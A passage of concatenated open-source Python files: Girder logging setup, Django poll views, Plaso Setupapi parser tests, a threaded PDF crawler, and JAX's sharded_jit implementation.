eh.setFormatter(fmt)
logger.addHandler(eh)
# Record cherrypy errors in our logs, too
cherrypy.log.error_log.addHandler(eh)
else:
infoMaxLevel = logging.CRITICAL
if isinstance(getattr(logging, logCfg.get('log_max_info_level', ''), None), int):
infoMaxLevel = getattr(logging, logCfg['log_max_info_level'])
ih = logging.handlers.RotatingFileHandler(
logPaths['info'], maxBytes=logSize, backupCount=backupCount)
ih.setLevel(level)
ih.addFilter(LogLevelFilter(min=logging.DEBUG, max=infoMaxLevel))
ih._girderLogHandler = 'info'
ih.setFormatter(fmt)
logger.addHandler(ih)
# Record cherrypy errors in our logs, too
cherrypy.log.error_log.addHandler(ih)
# Log http accesses to the screen and/or the info log.
accessLog = logCfg.get('log_access', 'screen')
if not isinstance(accessLog, (tuple, list, set)):
accessLog = [accessLog]
if _quiet or ('screen' not in accessLog and 'stdout' not in accessLog):
cherrypy.config.update({'log.screen': False})
if 'info' in accessLog:
cherrypy.log.access_log.addHandler(ih)
return logger
logger = _setupLogger()
def logStdoutStderr(force=False):
if _originalStdOut == sys.stdout or force:
sys.stdout = StreamToLogger(_originalStdOut, logger, logging.INFO)
sys.stderr = StreamToLogger(_originalStdErr, logger, logging.ERROR)
def logprint(*args, **kwargs):
"""
Send a message to both stdout and the appropriate logs. This behaves like
Python3's print statement, plus takes additional named parameters:
:param level: the log level. This determines which log handlers will store
the log message. The log is always sent to stdout.
:param color: one of the constants.TerminalColor values or None.
:param exc_info: None to not print exception information. True for the
last exception, or a tuple of exception information.
"""
data = six.StringIO()
kwargs = (kwargs or {}).copy()
level = kwargs.pop('level', logging.DEBUG)
color = kwargs.pop('color', None)
exc_info = kwargs.pop('exc_info', None)
kwargs['file'] = data
six.print_(*args, **kwargs)
data = data.getvalue().rstrip()
if exc_info and not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
data += '\n' + ''.join(traceback.format_exception(*exc_info)).rstrip()
logger.log(level, data)
if not _quiet:
if color:
data = getattr(TerminalColor, color)(data)
_originalStdOut.write('%s\n' % data)
_originalStdOut.flush()
def _setupCache():
"""
Setup caching based on configuration file.
Cache backends are forcibly replaced because Girder initially configures
the regions with the null backends.
"""
curConfig = config.getConfig()
if curConfig['cache']['enabled']:
# Replace existing backend, this is necessary
# because they're initially configured with the null backend
cacheConfig = {
'cache.global.replace_existing_backend': True,
'cache.request.replace_existing_backend': True
}
curConfig['cache'].update(cacheConfig)
cache.configure_from_config(curConfig['cache'], 'cache.global.')
requestCache.configure_from_config(curConfig['cache'], 'cache.request.')
else:
# Reset caches back to null cache (in the case of server teardown)
cache.configure(backend='dogpile.cache.null', replace_existing_backend=True)
requestCache.configure(backend='dogpile.cache.null', replace_existing_backend=True)
# Although the rateLimitBuffer has no pre-existing backend, this method may be called multiple
# times in testing (where caches were already configured)
rateLimitBuffer.configure(backend='dogpile.cache.memory', replace_existing_backend=True)
# Expose common logging levels and colors as methods of logprint.
logprint.info = functools.partial(logprint, level=logging.INFO, color='info')
logprint.warning = functools.partial(
logprint, level=logging.WARNING, color='warning')
logprint.error = functools.partial(
logprint, level=logging.ERROR, color='error')
logprint.success = functools.partial(
logprint, level=logging.INFO, color='success')
logprint.critical = functools.partial(
logprint, level=logging.CRITICAL, color='error')
logprint.debug = logprint
logprint.exception = functools.partial(
logprint, level=logging.ERROR, color='error', exc_info=True)
# alias girder.plugin => girder.utility.plugin_utilities
from girder.utility import plugin_utilities as plugin # noqa
| Xarthisius/girder | girder/__init__.py | Python | apache-2.0 | 12,075 |
"""
Copyright 2016 Andrea McIntosh
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
class IndexView(generic.ListView):
template_name = "polls/index.html"
context_object_name = 'latest_question_list'
def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except:
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| akmcinto/TodoApp | ToDoApp/polls/views.py | Python | apache-2.0 | 1,788 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Setupapi log parser."""
from __future__ import unicode_literals
import unittest
from plaso.parsers import setupapi
from tests.parsers import test_lib
class SetupapiLogUnitTest(test_lib.ParserTestCase):
"""Tests for the Windows Setupapi log parser.
Since Setupapi logs record in local time, these tests assume that the local
timezone is set to UTC.
"""
def testParseDevLog(self):
"""Tests the Parse function on setupapi.dev.log."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(['setupapi.dev.log'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 388)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:59:28.110000')
event = events[2]
self.CheckTimestamp(event.timestamp, '2016-10-05 11:16:03.747000')
event = events[4]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2016-10-05 11:16:16.471000')
expected_message = (
'Device Install (Hardware initiated) - SWD\\IP_TUNNEL_VBUS'
'\\Teredo_Tunnel_Device')
expected_short_message = (
'Device Install (Hardware initiated) - SWD\\IP_TUNNEL_VBUS'
'\\Teredo_Tunnel_Device')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[57]
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_message = (
'Device Install (DiInstallDriver) - C:\\Windows\\System32'
'\\DriverStore\\FileRepository\\prnms003.inf_x86_8f17aac186c70ea6'
'\\prnms003.inf - SUCCESS')
expected_short_message = (
'SUCCESS - Device Install (DiInstallDriver) - C:\\Windows\\System32'
'\\DriverStore\\...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[386]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2016-11-22 23:50:30.938000')
expected_message = (
'Device Install (Hardware initiated) - SWD\\WPDBUSENUM'
'\\_??_USBSTOR#Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07#99E2116A&0'
'#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}')
expected_short_message = (
'Device Install (Hardware initiated) - SWD\\WPDBUSENUM'
'\\_??_USBSTOR#Disk&Ven_Gen...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testParseSetupLog(self):
"""Tests the Parse function on setupapi.setup.log."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(['setupapi.setup.log'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 32)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:16.599000')
event = events[2]
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:28.973000')
event = events[4]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2015-11-22 17:53:29.305000')
expected_message = 'Setup Plug and Play Device Install'
expected_short_message = 'Setup Plug and Play Device Install'
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[14]
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_message = (
'Setup online Device Install (Hardware initiated) - SW'
'\\{97ebaacc-95bd-11d0-a3ea-00a0c9223196}'
'\\{53172480-4791-11D0-A5D6-28DB04C10000}')
expected_short_message = (
'Setup online Device Install (Hardware initiated) - SW'
'\\{97ebaacc-95bd-11d0-a3e...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
event = events[30]
event_data = self._GetEventDataOfEvent(storage_writer, event)
self.CheckTimestamp(event.timestamp, '2015-11-22 17:57:17.502000')
expected_message = (
'Setup Import Driver Package - C:\\Windows\\system32'
'\\spool\\tools\\Microsoft XPS Document Writer\\prnms001.Inf')
expected_short_message = (
'Setup Import Driver Package - C:\\Windows\\system32\\spool'
'\\tools\\Microsoft XPS D...')
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testParseSetupLogWithTimeZone(self):
"""Tests the Parse function on setupapi.setup.log with a time zone."""
parser = setupapi.SetupapiLogParser()
storage_writer = self._ParseFile(
['setupapi.setup.log'], parser, timezone='CET')
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 32)
events = list(storage_writer.GetEvents())
event = events[0]
self.CheckTimestamp(event.timestamp, '2015-11-22 16:53:16.599000')
if __name__ == '__main__':
unittest.main()
| rgayon/plaso | tests/parsers/setupapi.py | Python | apache-2.0 | 5,214 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
crawler.py
~~~~~~~~~~~~~~
A brief description goes here.
"""
import csv
import urllib2
import urllib
import re
import os
import urlparse
import threading
import logging
import logging.handlers
import time
import random
import bs4
MINIMUM_PDF_SIZE = 4506
TASKS = None
def create_logger(filename, logger_name=None):
logger = logging.getLogger(logger_name or filename)
fmt = '[%(asctime)s] %(levelname)s %(message)s'
datefmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(fmt=fmt, datefmt=datefmt)
handler = logging.handlers.RotatingFileHandler(filename, maxBytes=1024 * 1024 * 1024, backupCount=10)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
return logger
log = create_logger('crawl.log')
class ExceedMaximumRetryError(Exception):
def __init__(self, sbid, url):
self.sbid = sbid
self.url = url
def retrieve(url, sbid, output_folder):
"""Download the PDF or search for the webpage for any PDF link
Args:
url, assuming the input url is valid
"""
def _urlfetch(url, sbid, filename=None, retry=10):
"""
A wrapper for either urlopen or urlretrieve. It depends on the whether
there is a filename as input
"""
if filename and os.path.exists(filename):
log.warn("%s\tDUPLICATED\t%s" % (sbid, url))
return None
sleep_time = random.random() + 0.5
for i in range(1, retry+1):
try:
result = None
if filename:
result = urllib.urlretrieve(url, filename)
log.info("%s\tOK\t%s" % (sbid, url))
else:
# No log now, because later we would like to ensure
# the existance of PDFs
result = urllib2.urlopen(url).read()
return result
except urllib.ContentTooShortError as e:
log.warn("%s\tContentTooShortError\t%s\tRetry:%i&Sleep:%.2f" %
(sbid, url, i, sleep_time))
time.sleep(sleep_time)
except urllib2.HTTPError as e:
log.warn("%s\tHTTP%i\t%s\tRetry:%i&Sleep:%.2f\t%s" %
(sbid, e.code, url, i, sleep_time, e.reason))
time.sleep(sleep_time)
# Sleep longer if it is server error
# http://en.wikipedia.org/wiki/Exponential_backoff
if e.code / 100 == 5:
sleep_time = random.randint(0, 2 ** i - 1)
except urllib2.URLError as e:
log.warn("%s\tURLError\t%s\tRetry:%i&Sleep:%.2f\t%s" %
(sbid, url, i, sleep_time, e.reason))
time.sleep(sleep_time)
raise ExceedMaximumRetryError(sbid=sbid, url=url)
if url.endswith('.pdf'):
#: sbid is not unique, so use sbid+pdfname as new name
pdf_name = url.split('/')[-1].split('.')[0]
_urlfetch(url, sbid, os.path.join(output_folder, "%s.%s.pdf" % (sbid, pdf_name)))
else:
page = _urlfetch(url, sbid)
soup = bs4.BeautifulSoup(page)
anchors = soup.findAll('a', attrs={'href': re.compile(".pdf$", re.I)})
if not anchors:
log.warn("%s\tNO_PDF_DETECTED\t%s" % (sbid, url))
return None
for a in anchors:
href = a['href']
pdf_name = href.split('/')[-1]
sub_url = urlparse.urljoin(url, href)
_urlfetch(sub_url, sbid, os.path.join(output_folder, "%s.%s" % (sbid, pdf_name)))
def get_tasks(csv_filepath):
"""
Returns:
[{'ScienceBaseID': a1b2c3d4, 'webLinks__uri': 'http://balabala'}, {}]
"""
l = []
with open(csv_filepath, 'r') as f:
reader = csv.DictReader(f, delimiter=',', quotechar='"')
for row in reader:
if 'Action' in row and row['Action'].lower() == 'ignore for now':
continue
else:
l.append(row)
return l
def get_completed_tasks(output_folder):
"""
Return downloaded tasks
"""
completed = set()
for f in os.listdir(output_folder):
filepath = os.path.join(output_folder, f)
with open(filepath, 'r') as ff:
head_line = ff.readline()
#if os.stat(filepath).st_size > MINIMUM_PDF_SIZE:
if head_line.startswith("%PDF"):
completed.add(f.split('.')[0])
else:
os.remove(filepath)
print 'deleted: ', filepath, head_line
return completed
def crawl(csv_filepath, output_folder='pdfs', exclude_downloaded=False):
"""main function
"""
global TASKS
TASKS = get_tasks(csv_filepath)
excluded = set()
if exclude_downloaded:
excluded = get_completed_tasks(output_folder)
for i in range(128):
t = threading.Thread(target=crawler, args=(output_folder, excluded))
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
def crawler(output_folder, excluded=set()):
"""
Thread working function
"""
finished = 0
print "thread %i has started, exclude %i items" %\
(threading.current_thread().ident, len(excluded))
global TASKS
while True:
task = None
try:
task = TASKS.pop()
except IndexError:
print "thread %i finished %i tasks, exiting for no task available"\
% (threading.current_thread().ident, finished)
break
try:
if not task:
break
sbid = task['ScienceBaseID']
# some webLinks__uri looks like:
# http://www.springerlink.com/content/p543611u8317w447/?p=a0e7243d602f4bd3b33b2089b2ed92e4&pi=5 ; http://www.springerlink.com/content/p543611u8317w447/fulltext.pdf
# since both url will redirect to the same url finally, I did not retrieve them twice
url = task['webLinks__uri']
if sbid in excluded:
continue
retrieve(url, sbid, output_folder)
finished += 1
if finished % 20 == 0:
print "%i has finished %i" % (threading.current_thread().ident, finished)
except ExceedMaximumRetryError as e:
log.error("%s\tEXCEED_MAXIMUM_RETRY\t%s" % (e.sbid, e.url))
except Exception as e:
print e, task
log.error("%s\tUNEXPECTED\t%s\t%s" % (sbid, url, e))
def main(argv):
print crawl(argv[1], '/scratch/pdfs')
if __name__ == '__main__':
import sys
main(sys.argv)
| luozhaoyu/deepdive | crawler.py | Python | apache-2.0 | 6,748 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from typing import Callable, Iterable, Optional, Tuple, Union
from absl import logging
import numpy as np
from jax import core
from jax.interpreters import ad
from jax.interpreters import partial_eval as pe
# TODO(skye): separate pmap into it's own module?
from jax.interpreters import mlir
from jax.interpreters import pxla
from jax.interpreters import xla
from jax import linear_util as lu
from jax._src import dispatch
from jax._src.lib import xla_bridge as xb
from jax._src.lib import xla_client as xc
from jax._src.lib.mlir import ir
from jax._src.lib.mlir.dialects import func as func_dialect
from jax._src.api_util import (argnums_partial, flatten_axes, flatten_fun,
_ensure_index_tuple)
import jax._src.util as util
from jax.tree_util import tree_flatten, tree_unflatten
from jax._src.util import (new_name_stack, wrap_name, wraps, safe_map,
safe_zip, HashableFunction)
from jax._src.config import config
xops = xc._xla.ops
def _map(f, *xs):
return tuple(map(f, *xs))
class ResultToPopulate: pass
result_to_populate = ResultToPopulate()
def _avals_to_results_handler(nrep, npart, partitions, out_avals):
handlers = [_aval_to_result_handler(npart, parts, out_aval)
for parts, out_aval in safe_zip(partitions, out_avals)]
def handler(out_bufs):
return [h(bufs) for h, bufs in zip(handlers, out_bufs)]
return handler
def _aval_to_result_handler(npart, parts, aval):
if aval is not core.abstract_unit:
spec = pxla.partitioned_sharding_spec(npart, parts, aval)
indices = pxla.spec_to_indices(aval.shape, spec)
else:
spec = indices = None
return pxla.local_aval_to_result_handler(aval, spec, indices)
@lu.cache
def _sharded_callable(
fun: lu.WrappedFun, nparts: Optional[int],
in_parts: Tuple[pxla.PartitionsOrReplicated, ...],
out_parts_thunk: Callable[[], Tuple[pxla.PartitionsOrReplicated, ...]],
local_in_parts: Optional[Tuple[pxla.PartitionsOrReplicated, ...]],
local_out_parts_thunk: Callable[[], Optional[Tuple[pxla.PartitionsOrReplicated, ...]]],
local_nparts: Optional[int], name: str, *abstract_args):
nrep = 1
if local_in_parts is None:
local_in_parts = in_parts
global_abstract_args = [pxla.get_global_aval(arg, parts, lparts)
for arg, parts, lparts
in safe_zip(abstract_args, in_parts, local_in_parts)]
if logging.vlog_is_on(2):
logging.vlog(2, "abstract_args: %s", abstract_args)
logging.vlog(2, "global_abstract_args: %s", global_abstract_args)
logging.vlog(2, "in_parts: %s", in_parts)
logging.vlog(2, "local_in_parts: %s", local_in_parts)
jaxpr, global_out_avals, consts = pe.trace_to_jaxpr_final(fun, global_abstract_args)
platform = xb.get_backend().platform
if platform not in ["tpu", "gpu"]:
# TODO(skye): fall back to regular jit?
raise ValueError(f"sharded_jit not supported for {platform}")
nparts = pxla.reconcile_num_partitions(jaxpr, nparts)
assert nparts is not None
if nparts > xb.device_count():
raise ValueError(
f"sharded_jit computation requires {nparts} devices, "
f"but only {xb.device_count()} devices are available.")
if xb.local_device_count() < nparts < xb.device_count():
raise NotImplementedError(
f"sharded_jit across multiple hosts must use all available devices. "
f"Got {nparts} out of {xb.device_count()} requested devices "
f"(local device count: {xb.local_device_count()})")
if local_nparts is None:
if nparts > xb.local_device_count():
raise ValueError(
"Specify 'local_nparts' when using cross-process sharded_jit "
"and all inputs and outputs are replicated.")
else:
local_nparts = nparts
if local_nparts > xb.local_device_count():
raise ValueError(
f"sharded_jit computation requires {local_nparts} local devices, "
f"but only {xb.local_device_count()} local devices are available.")
if logging.vlog_is_on(2):
logging.vlog(2, "nparts: %d local_nparts: %d", nparts, local_nparts)
out_parts = out_parts_thunk()
local_out_parts = local_out_parts_thunk()
if local_out_parts is None:
local_out_parts = out_parts
if logging.vlog_is_on(2):
logging.vlog(2, "out_parts: %s", out_parts)
logging.vlog(2, "local_out_parts: %s", local_out_parts)
local_out_avals = [pxla.get_local_aval(out, parts, lparts)
for out, parts, lparts
in safe_zip(global_out_avals, out_parts, local_out_parts)]
log_priority = logging.WARNING if config.jax_log_compiles else logging.DEBUG
logging.log(log_priority,
"Compiling %s for %d devices with args %s.",
fun.__name__, nparts, global_abstract_args)
c = xc.XlaBuilder("spjit_{}".format(fun.__name__))
xla_consts = _map(partial(xla.pyval_to_ir_constant, c), consts)
xla_args = _xla_sharded_args(c, global_abstract_args, in_parts)
axis_env = xla.AxisEnv(nrep, (), ())
ctx = xla.TranslationContext(
c, platform, axis_env, new_name_stack(wrap_name(name, "sharded_jit")))
out_nodes = xla.jaxpr_subcomp(ctx, jaxpr, xla_consts, *xla_args)
out_tuple = xla.with_sharding(c, out_parts, xops.Tuple, c, out_nodes)
built = c.Build(out_tuple)
if nparts <= xb.local_device_count():
devices = xb.local_devices()[:nparts]
else:
assert nparts == xb.device_count()
devices = xb.devices()
device_assignment = np.array([[d for d in devices]])
device_assignment = np.reshape(device_assignment, (-1, nparts))
# device_assignment = None # TODO(skye): replace with default device assignment?
compiled = dispatch.backend_compile(
xb.get_backend(), built,
xb.get_compile_options(nrep, nparts, device_assignment))
input_specs = [
pxla.partitioned_sharding_spec(local_nparts, parts, aval)
for parts, aval in zip(local_in_parts, abstract_args)]
input_indices = [pxla.spec_to_indices(aval.shape, spec)
if spec is not None else None
for aval, spec in zip(abstract_args, input_specs)]
handle_args = partial(pxla.shard_args, compiled.local_devices(),
input_indices)
handle_outs = _avals_to_results_handler(nrep, local_nparts, # type: ignore
local_out_parts, local_out_avals)
return partial(_execute_spatially_partitioned, compiled, handle_args,
handle_outs)
def _sharded_jit_translation_rule(ctx, avals_in, avals_out, *in_nodes,
in_parts, out_parts_thunk, nparts,
name, call_jaxpr, local_in_parts,
local_out_parts_thunk, local_nparts):
subc = xc.XlaBuilder(f"sharded_jit_{name}")
# We assume any extra leading in_nodes are constants and replicate them.
num_extra_nodes = len(in_nodes) - len(in_parts)
assert num_extra_nodes >= 0
in_parts = (None,) * num_extra_nodes + in_parts
args = []
for i, (n, sharding) in enumerate(safe_zip(in_nodes, in_parts)):
# We use xla.set_sharding instead of xla.with_sharding because inlined calls
# shouldn't have shardings set directly on the inputs or outputs.
arg = xla.parameter(subc, i, ctx.builder.GetShape(n))
args.append(xla.set_sharding(subc, arg, sharding))
sub_ctx = ctx.replace(
builder=subc,
name_stack=new_name_stack(wrap_name(name, "sharded_jit")))
out_nodes = xla.jaxpr_subcomp(sub_ctx, call_jaxpr, (), *args)
out_parts = out_parts_thunk()
assert len(out_parts) == len(out_nodes)
out_nodes = [xla.set_sharding(subc, out, sharding)
for out, sharding in safe_zip(out_nodes, out_parts)]
subc = subc.build(xops.Tuple(subc, out_nodes))
return xla.xla_destructure(ctx.builder,
xops.Call(ctx.builder, subc, list(in_nodes)))
def _sharded_jit_lowering(ctx, *in_nodes,
in_parts, out_parts_thunk, nparts,
name, call_jaxpr, local_in_parts,
local_out_parts_thunk, local_nparts):
# We assume any extra leading in_nodes are constants and replicate them.
num_extra_nodes = len(in_nodes) - len(in_parts)
assert num_extra_nodes >= 0
in_parts = (None,) * num_extra_nodes + in_parts
args = []
for ns, sharding in safe_zip(
safe_map(mlir.wrap_singleton_ir_values, in_nodes), in_parts):
if sharding is not None:
args.append(
[mlir.wrap_with_sharding_op(n, xla.sharding_to_proto(sharding))
for n in ns])
else:
args.append(ns)
sub_ctx = ctx.module_context.replace(
name_stack=new_name_stack(wrap_name(name, "sharded_jit")))
fn = mlir.lower_jaxpr_to_fun(sub_ctx, f"sharded_jit_{name}",
core.ClosedJaxpr(call_jaxpr, ()))
output_types = safe_map(mlir.aval_to_ir_types, ctx.avals_out)
flat_output_types = util.flatten(output_types)
call = func_dialect.CallOp(flat_output_types,
ir.FlatSymbolRefAttr.get(fn.name.value),
mlir.flatten_lowering_ir_args(args))
out_nodes = util.unflatten(call.results, safe_map(len, output_types))
out_parts = out_parts_thunk()
outputs = []
for ns, sharding in safe_zip(out_nodes, out_parts):
if sharding is not None:
outputs.append(
[mlir.wrap_with_sharding_op(n, xla.sharding_to_proto(sharding))
for n in ns])
else:
outputs.append(ns)
return outputs
def _execute_spatially_partitioned(compiled, in_handler, out_handler, *args):
input_bufs = in_handler(args)
out_bufs = compiled.execute_sharded_on_local_devices(input_bufs)
return out_handler(out_bufs)
def _xla_sharded_args(c, avals, in_parts):
xla_args = []
for i, (sharding, aval) in enumerate(safe_zip(in_parts, avals)):
param = xla.with_sharding(c, sharding, xla.parameter, c, i,
*xla.aval_to_xla_shapes(aval))
xla_args.append(param)
return xla_args
def _sharded_call_impl(fun, *args, nparts, in_parts, out_parts_thunk,
local_in_parts, local_out_parts_thunk, local_nparts,
name):
compiled_fun = _sharded_callable(fun, nparts, in_parts, out_parts_thunk,
local_in_parts, local_out_parts_thunk,
local_nparts, name,
*map(xla.abstractify, args))
return compiled_fun(*args)
sharded_call_p = core.CallPrimitive("sharded_call")
sharded_call = sharded_call_p.bind
sharded_call_p.def_impl(_sharded_call_impl)
xla.register_translation(sharded_call_p, _sharded_jit_translation_rule)
mlir.register_lowering(sharded_call_p, _sharded_jit_lowering)
class _UnconstrainedPartitionSingleton:
def __str__(self):
return "UNCONSTRAINED"
# Unconstrained sentinel value for PartitionSpec, representing a dimension for
# which the user wants XLA to assign the best partitioning.
# TODO(yashkatariya): May rename to AUTO.
_UNCONSTRAINED_PARTITION = _UnconstrainedPartitionSingleton()
class PartitionSpec(tuple):
"""Tuple of integer specifying how a value should be partitioned.
Each integer corresponds to how many ways a dimension is partitioned. We
create a separate class for this so JAX's pytree utilities can distinguish it
from a tuple that should be treated as a pytree.
"""
def __new__(cls, *partitions):
return tuple.__new__(PartitionSpec, partitions)
def __repr__(self):
return "PartitionSpec%s" % tuple.__repr__(self)
"""A sentinel value representing a dim is unconstrained."""
UNCONSTRAINED = _UNCONSTRAINED_PARTITION
def sharded_jit(
fun: Callable,
in_parts,
out_parts,
num_partitions: Optional[int] = None,
local_in_parts=None,
local_out_parts=None,
local_num_partitions=None,
static_argnums: Union[int, Iterable[int]] = (),
):
"""Like ``jit``, but partitions ``fun`` across multiple devices.
WARNING: this feature is still under active development! It may not work well,
and may change without warning!
`sharded_jit` sets up ``fun`` for just-in-time compilation with XLA, but
unlike ``jit``, the compiled function will run across multiple devices
(e.g. multiple GPUs or multiple TPU cores). This is achieved by spatially
partitioning the data that flows through the computation, so each operation is
run across all devices and each device runs only a shard of the full
data. (Some data can optionally be replicated, which is sometimes more
efficient for small arrays when combined with larger spatially-partitioned
arrays.) Communication between devices is automatically inserted as necessary.
``sharded_jit`` can be useful if the jitted version of ``fun`` would not fit
in a single device's memory, or to speed up ``fun`` by running each operation
in parallel across multiple devices.
Note: ``sharded_jit`` is currently available on TPU only!
Args:
fun: Function to be jitted.
in_parts: Specifications for how each argument to ``fun`` should be
partitioned or replicated. This should be a PartitionSpec indicating into
how many partitions each dimension should be sharded, ``None`` indicating
replication, or (nested) standard Python containers thereof. For example,
``in_parts=PartitionSpec(2,1)`` means all arguments should be partitioned
over two devices across the first dimension;
``in_parts=(PartitionSpec(2,2), PartitionSpec(4,1), None)`` means the
first argument should be partitioned over four devices by splitting both
of its dimensions in half, the second argument should be partitioned over
the four devices across the first dimension, and the third argument is
replicated across the four devices.
All PartitionSpecs in a given ``sharded_jit`` call must correspond to the
same total number of partitions, i.e. the product of all PartitionSpecs
must be equal, and the number of dimensions in the PartitionSpec
corresponding to an array ``a`` should equal ``a.ndim``. Arguments marked
as static using ``static_argnums`` (see below) do not require a
PartitionSpec.
out_parts: The output partitions, i.e. how each output of ``fun`` should be
partitioned or replicated. This follows the same convention as
``in_parts``.
num_partitions: Optional. If set, explicitly specifies the number of devices
``fun`` should partitioned across (rather than inferring it from
``in_parts``, ``out_parts``, and/or any ``with_sharding_constraint``
calls). Setting this should usually be unnecessary, but can be used to
maintain device persistence across multiple sharded_jit calls when some of
those calls only involve replicated values.
local_in_parts: Optional. This should be set when partitioning across
multiple processes, and says how each process's worth of data should be
partitioned (vs. in_parts which is the "global" partitioning across all
processes). This API is likely to change in the future.
local_out_parts: Optional. This should be set when partitioning across
multiple processes, and says how each process's worth of data should be
partitioned (vs. out_parts which is the "global" partitioning across all
processes). This API is likely to change in the future.
local_num_partitions: Optional. Explicitly specifies the numbers of local
devices to partitions across in a multi-process setting. This API is
likely to change in the future.
static_argnums: An int or collection of ints specifying which positional
arguments to treat as static (compile-time constant). Operations that only
depend on static arguments will be constant-folded. Calling the jitted
function with different values for these constants will trigger
recompilation. If the jitted function is called with fewer positional
arguments than indicated by ``static_argnums`` then an error is raised.
Each of the static arguments will be broadcasted to all devices, and
cannot be partitioned - these arguments will be removed from the *args
list before matching each remaining argument with its corresponding
PartitionSpec. Arguments that are not arrays or containers thereof must
be marked as static. Defaults to ``()``.
Returns:
A version of ``fun`` that will be distributed across multiple devices.
"""
if num_partitions is not None:
nparts = num_partitions
else:
nparts = pxla.get_num_partitions(in_parts, out_parts)
if local_num_partitions is not None:
local_nparts = local_num_partitions
else:
local_nparts = pxla.get_num_partitions(local_in_parts, local_out_parts)
static_argnums = _ensure_index_tuple(static_argnums)
@wraps(fun)
def wrapped(*args, **kwargs):
if kwargs:
raise NotImplementedError("sharded_jit over kwargs not yet supported")
f = lu.wrap_init(fun)
if static_argnums:
if max(static_argnums) >= len(args):
raise ValueError(
f"jitted function has static_argnums={static_argnums}"
f" but was called with only {len(args)} positional "
f"argument{'s' if len(args) > 1 else ''}. "
"All static broadcasted arguments must be passed positionally.")
dyn_argnums = [i for i in range(len(args)) if i not in static_argnums]
f, args = argnums_partial(f, dyn_argnums, args)
args_flat, in_tree = tree_flatten((args, kwargs))
in_parts_flat = tuple(flatten_axes("sharded_jit in_parts",
in_tree.children()[0], in_parts))
if local_in_parts is not None:
local_in_parts_flat = tuple(flatten_axes("sharded_jit local_in_parts",
in_tree.children()[0], local_in_parts))
else:
local_in_parts_flat = None
flat_fun, out_tree = flatten_fun(f, in_tree)
# TODO(skye): having a function-typed param in a primitive seems dicey, is
# there a better way?
out_parts_thunk = HashableFunction(
lambda: tuple(flatten_axes("sharded_jit out_parts", out_tree(), out_parts)),
closure=out_parts)
if local_out_parts:
local_out_parts_thunk = HashableFunction(
lambda: tuple(flatten_axes("sharded_jit local_out_parts",
out_tree(), local_out_parts)),
closure=local_out_parts)
else:
local_out_parts_thunk = HashableFunction(lambda: None, closure=None)
out = sharded_call(
flat_fun,
*args_flat,
nparts=nparts,
in_parts=in_parts_flat,
out_parts_thunk=out_parts_thunk,
local_in_parts=local_in_parts_flat,
local_out_parts_thunk=local_out_parts_thunk,
local_nparts=local_nparts,
name=flat_fun.__name__)
return tree_unflatten(out_tree(), out)
return wrapped
def _sharding_constraint_impl(x, partitions):
# TODO(skye): can we also prevent this from being called in other
# non-sharded_jit contexts? (e.g. pmap, control flow)
raise NotImplementedError(
"with_sharding_constraint() should only be called inside sharded_jit()")
def _sharding_constraint_translation_rule(ctx, avals_in, avals_out, x_node,
partitions):
return [xla.set_sharding(ctx.builder, x_node, partitions)]
sharding_constraint_p = core.Primitive("sharding_constraint")
sharding_constraint_p.def_impl(_sharding_constraint_impl)
sharding_constraint_p.def_abstract_eval(lambda x, partitions: x)
ad.deflinear2(sharding_constraint_p,
